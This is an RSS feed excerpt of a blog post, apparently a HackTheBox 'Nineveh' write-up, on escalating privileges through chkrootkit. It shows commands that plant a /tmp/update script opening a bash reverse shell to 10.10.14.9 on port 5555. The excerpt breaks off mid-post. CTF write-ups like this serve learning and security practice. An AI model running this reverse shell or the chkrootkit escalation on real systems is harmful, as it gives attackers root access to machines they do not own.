https://www.rchitect.in/categories/linux-exploit/Recent content in Linux Exploit on rchitectHugoenWed, 09 Mar 2022 00:00:00 +0000https://www.rchitect.in/posts/chk-rootkit/Wed, 09 Mar 2022 00:00:00 +0000https://www.rchitect.in/posts/chk-rootkit/<h1 id="chkrootkit-exploit"> Chkrootkit Exploit <a class="heading-link" href="#chkrootkit-exploit"> <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i> <span class="sr-only">Link to heading</span> </a> </h1> <p>I have tried pspy and i could see the chkrootkit</p> <p>Lets search for the exploit</p> <p>As per this exploit if you create any exploit ,if you create a file named &ldquo;update&rdquo; under /tmp.</p> <pre tabindex="0"><code>amrois@nineveh:/tmp$ printf &#39;#!/bin/sh\n&#39; &gt; update amrois@nineveh:/tmp$ printf &#39;/bin/bash -c &#34;/bin/bash -i &gt; /dev/tcp/10.10.14.9/5555 0&lt;&amp;1&#34;\n&#39; &gt;&gt; update amrois@nineveh:/tmp$ chmod +x update </code></pre><p>Or You can use EOF to repalce printf command like below</p>